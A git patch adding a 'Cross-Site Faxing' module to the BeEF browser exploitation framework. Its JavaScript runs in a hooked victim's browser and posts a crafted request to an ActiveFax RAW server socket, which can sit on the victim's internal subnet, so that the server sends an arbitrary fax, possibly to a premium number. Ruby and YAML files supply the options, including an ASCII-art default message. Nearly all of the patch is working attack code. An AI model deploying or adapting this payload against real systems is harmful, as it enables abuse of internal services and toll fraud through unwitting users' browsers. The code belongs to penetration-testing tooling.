From 7afa52ec99ae6fc5e5a05e0d128dc189711e0bab Mon Sep 17 00:00:00 2001 From: bmantra Date: Fri, 29 Nov 2013 21:06:36 +0100 Subject: [PATCH] add module for Cross-Site Faxing (XSF) --- modules/ipec/cross_site_faxing/command.js | 28 ++++++++++ modules/ipec/cross_site_faxing/config.yaml | 15 +++++ modules/ipec/cross_site_faxing/module.rb | 64 ++++++++++++++++++++++ 3 files changed, 107 insertions(+) create mode 100644 modules/ipec/cross_site_faxing/command.js create mode 100644 modules/ipec/cross_site_faxing/config.yaml create mode 100644 modules/ipec/cross_site_faxing/module.rb diff --git a/modules/ipec/cross_site_faxing/command.js b/modules/ipec/cross_site_faxing/command.js new file mode 100644 index 000000000..2fb19bdca --- /dev/null +++ b/modules/ipec/cross_site_faxing/command.js @@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var target_ip = "<%= @ip %>"; + var target_port = "<%= @port %>"; + var recname = "<%= @recname %>"; + var recfax = "<%= @recfax %>"; + var subject = "<%= @subject %>"; + var msg = "<%= @msg.gsub(/"/, '\\"').gsub(/\r?\n/, '\\n') %>"; + + var uri = "http://"+target_ip+":"+target_port+"/"; + var post_body = "@F201 "+recname+"@@F211 "+recfax+"@@F307 "+subject+"@@F301 1@\n"+msg; + + var xhr = new XMLHttpRequest(); + + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.send(post_body); + setTimeout(function(){xhr.abort()}, 5000); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent'); + +}); + diff --git a/modules/ipec/cross_site_faxing/config.yaml b/modules/ipec/cross_site_faxing/config.yaml new file mode 100644 index 000000000..cec863347 --- /dev/null +++ b/modules/ipec/cross_site_faxing/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cross_site_faxing: + enable: true + category: "IPEC" + name: "Cross-Site Faxing (XSF)" + description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send a message to ActiveFax RAW server socket (3000 by default) on the target specified in the 'Target Address' input field. This module can send a FAX to a (premium) faxnumber via the ActiveFax Server.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." + authors: ["Bart Leppens"] + target: + working: ["all"] diff --git a/modules/ipec/cross_site_faxing/module.rb b/modules/ipec/cross_site_faxing/module.rb new file mode 100644 index 000000000..b18467bc9 --- /dev/null +++ b/modules/ipec/cross_site_faxing/module.rb @@ -0,0 +1,64 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Cross_site_faxing < BeEF::Core::Command + + def self.options + return [ + {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, + {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '3000'}, + {'name'=>'recname', 'ui_label' => 'Name of the receiver', 'value' => 'BeEF'}, + {'name'=>'recfax', 'ui_label' => 'Fax number of the recipient', 'value' => '+1 11 112233-2'}, + {'name'=>'subject', 'ui_label' => 'Subject', 'value' => 'Got some BeEF?'}, + {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"********************************************************************** + + .O, + lkOl + od cOc + 'X, cOo. + cX, ,dkc. + BeEF ;Kd. ,odo,. + .dXl . .:xkl' + 'OKc .;c' ,oOk: + ,kKo. .cOkc. .lOk:. + .dXx. :KWKo. 'dXd. + .oXx. cXWW0c..dXd. + oW0 .OWWWNd.'KK. + ....,;lkNWx KWWWWX:'XK. + ,o:, .,:odkO00XNK0Okxdlc,. .KWWWWWWddWd + K::Ol .:d0NXK0OkxdoxO' .lXWWWWWWWWKW0 + od d0. .l0NKOxdooooooox0. .,cdOXWWWWWWWWWWWWWx + :O ;K; ;kN0kooooooooooooK: .':ok0NWWWWWWWWWWWWWWWWWWK. + 'X .Kl ;KNOdooooooooooooooXkkXWWWWWWWWWWWWWWWWWWWWWWWNd. + .N. o. .Kl 'OW0doooooooooooooodkXWWWWWWWWWWWWWWWWWWWWWWWW0l. + 0l oK' .kO:';kNNkoooooooooooook0XWWWWWWWWWWWWWWWWWWWWWWWKx:. + lX.,WN: .:c:xWkoooooooooood0NWW0OWWWWWWWWWWWWWWWWWWWKo. + 0O.0WWk' .XKoooooooooooONWWNo dWWWWWWWWWWWWWWWWWl + oKkNWWWX00NWXdooooooooxXWWNk' dWWWWWWWWWWWWWWWWX + .cONWWWWWWWWOoooooooONWWK:...c0WWWWWWWWWWWWWWWWWW: + .;oONWWWWxooooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. + 'XW0oooookNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWd + oW0ooooo0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWO + ;NXdooodKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWx + ;xkOOdooooxOO0KNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWX. + .NOoddxkkkkxxdoookKWWWWWWWWWWWWWWWWWWWWWWWWWWX' + :KNWWWWWWWWWWX0xooONWWWWWWWWWWWWWWWWWWWWWWWk. + .xNXxKWWWWWWWOXWWXxoKWWWWWWWWWWWWWWWWWWWWNk' + OWl cNWWWWWWWk oNWNxKWWWWWWWWWWWWWWWWWNOl. + ,Wk xWWWWWWWWd xWWNWWWWWWWWWWWWXOdc,. + .N0 lOXNX0x; .KWWWWWWWWWWWNkc. + :NO, 'lXWWWWWWWWWNk:. + .dXN0OkxkO0NWWWWWWWWWWKl. + .';o0WWWWWWWWWWWNk; + .cxOKXKKOd;. + +**********************************************************************", 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end +end